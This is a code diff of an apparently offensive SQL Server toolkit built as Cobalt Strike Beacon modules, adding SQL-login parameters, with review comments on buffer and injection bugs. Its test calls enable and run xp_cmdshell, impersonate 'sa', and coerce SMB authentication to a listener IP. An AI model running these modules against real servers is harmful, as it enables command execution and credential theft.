@@ -124,13 +130,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CoerceSmb("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "\\\\10.2.99.1"); + CoerceSmb("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "\\\\10.2.99.1"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CoerceSmb("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "\\\\10.2.99.1"); + CoerceSmb("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "\\\\10.2.99.1"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CoerceSmb("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "\\\\10.2.99.1"); + CoerceSmb("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "\\\\10.2.99.1"); } #endif diff --git a/src/SQL/tables/entry.c b/src/SQL/tables/entry.c index 46424f0..6b16fb4 100644 --- a/src/SQL/tables/entry.c +++ b/src/SQL/tables/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckTables(char* server, char* database, char* link, char* impersonate) +void CheckTables(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckTables(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } @@ -81,6 +81,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -92,11 +94,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -111,7 +117,7 @@ VOID go( return; } - CheckTables(server, database, link, impersonate); + CheckTables(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -121,13 +127,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckTables("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckTables("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckTables("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckTables("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckTables("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckTables("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/togglemodule/entry.c b/src/SQL/togglemodule/entry.c index 59af66f..d970416 100644 --- a/src/SQL/togglemodule/entry.c +++ b/src/SQL/togglemodule/entry.c 
@@ -5,13 +5,13 @@ // rpc requires different functions/values than the other modules -void ToggleRpc(char* server, char* database, char* link, char* impersonate, char* value) +void ToggleRpc(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* value) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLHDBC dbc = NULL; - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { goto END; @@ -53,13 +53,13 @@ void ToggleRpc(char* server, char* database, char* link, char* impersonate, char // non-rpc modules are treated the same -void ToggleGenericModule(char* server, char* database, char* link, char* impersonate, char* module, char* value) +void ToggleGenericModule(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* module, char* value) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; SQLHDBC dbc = NULL; - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); if (dbc == NULL) { goto END; @@ -110,6 +110,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -123,6 +125,8 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); @@ -130,6 +134,8 @@ VOID go( value = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; 
@@ -148,7 +154,7 @@ VOID go( printoutput(TRUE); return; } - ToggleRpc(server, database, link, impersonate, value); + ToggleRpc(server, user, password, database, link, impersonate, value); } // we're toggling one of the other modules that we treat the same else @@ -158,7 +164,7 @@ VOID go( return; } - ToggleGenericModule(server, database, link, impersonate, module, value); + ToggleGenericModule(server, user, password, database, link, impersonate, module, value); } 
@@ -170,28 +176,28 @@ VOID go( int main() { internal_printf("============ LINK RPC DISABLE TEST ============\n\n"); - ToggleRpc("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "FALSE"); + ToggleRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "FALSE"); internal_printf("\n\n============ LINK RPC ENABLE TEST ============\n\n"); - ToggleRpc("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "TRUE"); + ToggleRpc("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "TRUE"); internal_printf("\n\n============ BASE XP_CMDSHELL DISABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "xp_cmdshell", "0"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "xp_cmdshell", "0"); internal_printf("\n\n============ BASE XP_CMDSHELL ENABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "xp_cmdshell", "1"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "xp_cmdshell", "1"); internal_printf("\n\n============ IMPERSONATE XP_CMDSHELL DISABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "xp_cmdshell", "0"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "xp_cmdshell", "0"); internal_printf("\n\n============ IMPERSONATE XP_CMDSHELL ENABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "xp_cmdshell", "1"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "xp_cmdshell", "1"); internal_printf("\n\n============ LINK XP_CMDSHELL DISABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, 
"xp_cmdshell", "0"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "xp_cmdshell", "0"); internal_printf("\n\n============ LINK XP_CMDSHELL ENABLE TEST ============\n\n"); - ToggleGenericModule("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "xp_cmdshell", "1"); + ToggleGenericModule("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "xp_cmdshell", "1"); } #endif diff --git a/src/SQL/users/entry.c b/src/SQL/users/entry.c index 5cd8b32..8858ad9 100644 --- a/src/SQL/users/entry.c +++ b/src/SQL/users/entry.c @@ -3,7 +3,7 @@ #include "sql.c" -void CheckUsers(char* server, char* database, char* link, char* impersonate) +void CheckUsers(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -13,11 +13,11 @@ void CheckUsers(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -83,6 +83,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -94,11 +96,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; 
@@ -113,7 +119,7 @@ VOID go( return; } - CheckUsers(server, database, link, impersonate); + CheckUsers(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -123,13 +129,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - CheckUsers("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + CheckUsers("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - CheckUsers("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + CheckUsers("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n\n============ LINK TEST ============\n\n"); - CheckUsers("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + CheckUsers("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/whoami/entry.c b/src/SQL/whoami/entry.c index 1a657bb..3a4a9b5 100644 --- a/src/SQL/whoami/entry.c +++ b/src/SQL/whoami/entry.c @@ -21,7 +21,7 @@ void PrintMemberStatus(char* roleName, char* status) } } -void Whoami(char* server, char* database, char* link, char* impersonate) +void Whoami(char* server, char* user, char* password, char* database, char* link, char* impersonate) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; @@ -47,11 +47,11 @@ void Whoami(char* server, char* database, char* link, char* impersonate) if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) @@ -196,10 +196,9 @@ VOID go( IN ULONG Length ) { - // - // usage: whoami - // char* server; + char* user; + char* password; char* database; char* link; char* impersonate; 
@@ -211,11 +210,15 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -230,7 +233,7 @@ VOID go( return; } - Whoami(server, database, link, impersonate); + Whoami(server, user, password, database, link, impersonate); printoutput(TRUE); }; @@ -240,13 +243,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - Whoami("castelblack.north.sevenkingdoms.local", "master", NULL, NULL); + Whoami("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL); internal_printf("\n============ IMPERSONATE TEST ============\n\n"); - Whoami("castelblack.north.sevenkingdoms.local", "master", NULL, "sa"); + Whoami("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa"); internal_printf("\n============ LINK TEST ====\n\n"); - Whoami("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL); + Whoami("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL); } #endif diff --git a/src/SQL/xpcmd/entry.c b/src/SQL/xpcmd/entry.c index 5e9c324..5b39159 100644 --- a/src/SQL/xpcmd/entry.c +++ b/src/SQL/xpcmd/entry.c @@ -4,7 +4,7 @@ #include "sql_modules.c" -void ExecuteXpCmd(char* server, char* database, char* link, char* impersonate, char* command) +void ExecuteXpCmd(char* server, char* user, char* password, char* database, char* link, char* impersonate, char* command) { SQLHENV env = NULL; SQLHSTMT stmt = NULL; 
@@ -17,11 +17,11 @@ void ExecuteXpCmd(char* server, char* database, char* link, char* impersonate, c if (link == NULL) { - dbc = ConnectToSqlServer(&env, server, database); + dbc = ConnectToSqlServer(&env, server, user, password, database); } else { - dbc = ConnectToSqlServer(&env, server, NULL); + dbc = ConnectToSqlServer(&env, server, user, password, NULL); } if (dbc == NULL) { @@ -160,6 +160,8 @@ VOID go( ) { char* server; + char* user; + char* password; char* database; char* link; char* impersonate; @@ -172,12 +174,16 @@ VOID go( BeaconDataParse(&parser, Buffer, Length); server = BeaconDataExtract(&parser, NULL); + user = BeaconDataExtract(&parser, NULL); + password = BeaconDataExtract(&parser, NULL); database = BeaconDataExtract(&parser, NULL); link = BeaconDataExtract(&parser, NULL); impersonate = BeaconDataExtract(&parser, NULL); command = BeaconDataExtract(&parser, NULL); server = *server == 0 ? "localhost" : server; + user = *user == 0 ? NULL : user; + password = *password == 0 ? NULL : password; database = *database == 0 ? "master" : database; link = *link == 0 ? NULL : link; impersonate = *impersonate == 0 ? NULL : impersonate; @@ -192,7 +198,7 @@ VOID go( return; } - ExecuteXpCmd(server, database, link, impersonate, command); + ExecuteXpCmd(server, user, password, database, link, impersonate, command); printoutput(TRUE); }; 
@@ -202,13 +208,13 @@ VOID go( int main() { internal_printf("============ BASE TEST ============\n\n"); - ExecuteXpCmd("castelblack.north.sevenkingdoms.local", "master", NULL, NULL, "whoami /user"); + ExecuteXpCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, NULL, "whoami /user"); internal_printf("\n\n============ IMPERSONATE TEST ============\n\n"); - ExecuteXpCmd("castelblack.north.sevenkingdoms.local", "master", NULL, "sa", "whoami /user"); + ExecuteXpCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", NULL, "sa", "whoami /user"); internal_printf("\n\n============ LINK TEST ============\n\n"); - ExecuteXpCmd("castelblack.north.sevenkingdoms.local", "master", "BRAAVOS", NULL, "whoami /user"); + ExecuteXpCmd("castelblack.north.sevenkingdoms.local", NULL, NULL, "master", "BRAAVOS", NULL, "whoami /user"); } #endif diff --git a/src/common/bofdefs.h b/src/common/bofdefs.h index e40a59d..d61ab71 100755 --- a/src/common/bofdefs.h +++ b/src/common/bofdefs.h @@ -57,6 +57,7 @@ DECLSPEC_IMPORT char * __cdecl MSVCRT$strncat(char * __restrict__ _Dest,const ch DECLSPEC_IMPORT char * __cdecl MSVCRT$strncpy(char * __restrict__ _Dest,const char * __restrict__ _Source,size_t _Count); WINBASEAPI time_t __cdecl MSVCRT$time(time_t *_Time); WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg); +WINBASEAPI int __cdecl MSVCRT$_snprintf(char * __restrict__ d,size_t n,const char * __restrict__ format, ...); DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src); #define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size) @@ -122,6 +123,7 @@ WINBASEAPI int STDCALL WS2_32$WSAStartup(WORD wVersionRequested, LPWSADATA lpWSA #define MSVCRT$strncpy strncpy #define MSVCRT$time time #define MSVCRT$vsnprintf vsnprintf +#define MSVCRT$_snprintf _snprintf #define MSVCRT$strcpy strcpy // ODBC32 
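Review bot: The new `MSVCRT$_snprintf` declaration in the bofdefs.h hunk deserves a comment that it binds the MSVC `_snprintf`, not C99 `snprintf`: when the formatted output does not fit, `_snprintf` returns -1 and writes no terminating NUL. Every caller therefore has to reserve a byte and pre-zero the destination, which is not obvious from a declaration that sits next to `MSVCRT$vsnprintf`. Suggest adding above it `// NOTE: MSVC _snprintf returns -1 and does NOT NUL-terminate on truncation; reserve a byte and zero the buffer first`, so the `#define MSVCRT$_snprintf _snprintf` fallback in the second bofdefs.h hunk carries the same caveat.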
diff --git a/src/common/sql.c b/src/common/sql.c index 330d29b..9424ad8 100644 --- a/src/common/sql.c +++ b/src/common/sql.c @@ -401,10 +401,11 @@ BOOL PrintQueryResults(SQLHSTMT stmt, BOOL hasHeader) // // connects to a SQL server // -SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, char* dbName) +SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, char* user, char* password, char* dbName) { SQLRETURN ret; SQLCHAR connstr[1024]; + size_t totalSize = sizeof(connstr); SQLHDBC dbc = NULL; // @@ -437,18 +438,29 @@ SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, char* dbName) return NULL; } + MSVCRT$_snprintf((char*)connstr, totalSize - 1, "DRIVER={SQL Server};SERVER=%s;", server); + // // dbName may be NULL when a linked server is used // - if (dbName == NULL) + if (dbName != NULL) { - MSVCRT$sprintf((char*)connstr, "DRIVER={SQL Server};SERVER=%s;Trusted_Connection=Yes;", server); + size_t len = MSVCRT$strlen(connstr); + MSVCRT$_snprintf((char*)connstr + len, totalSize - len - 1, "DATABASE=%s;", dbName); + } + + // + // if no user was specified, use Windows authentication + // + if (user == NULL) + { + MSVCRT$strncat((char*)connstr, "Trusted_Connection=Yes;", totalSize - MSVCRT$strlen(connstr) - 1); } else { - MSVCRT$sprintf((char*)connstr, "DRIVER={SQL Server};SERVER=%s;DATABASE=%s;Trusted_Connection=Yes;", server, dbName); + size_t len = MSVCRT$strlen(connstr); + MSVCRT$_snprintf((char*)connstr + len, totalSize - len - 1, "UID=%s;PWD=%s;", user, password ? password : ""); } - // // connect to the sql server
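Review bot: `connstr` is still declared without an initializer (`SQLCHAR connstr[1024];`) while the function now fills it with `MSVCRT$_snprintf`, which on truncation writes no terminating NUL, so the `MSVCRT$strlen(connstr)` calls in the next hunk would read past the formatted text into uninitialized stack if `server` is long enough to overflow. Zeroing the buffer once after the declaration, e.g. `intZeroMemory(connstr, sizeof(connstr));` (the macro bofdefs.h already provides), turns the byte reserved by every `totalSize - 1` into a real terminator. `ConnectToSqlServer` continues past the hunk.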
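Review bot: `user` and `password` are spliced into the ODBC connection string verbatim in the `"UID=%s;PWD=%s;"` line, so a credential containing `;` (or beginning with a space or `{`) ends the attribute early and the remainder is parsed as further keywords, which at best fails the connect and at worst overrides `DATABASE` or `Trusted_Connection`. ODBC lets an attribute value be brace-quoted, so the format should become `"UID={%s};PWD={%s};"` with any `}` in either value rejected or escaped according to the driver's rules, since `}` terminates a braced value; the same applies to `dbName` in the `"DATABASE=%s;"` line. None of the three `_snprintf` return values are checked, so a truncated connection string is handed to the connect call that follows the hunk; treating a negative return as an error and returning NULL would match the existing `return NULL;` on handle failure above. The function body continues outside the hunk.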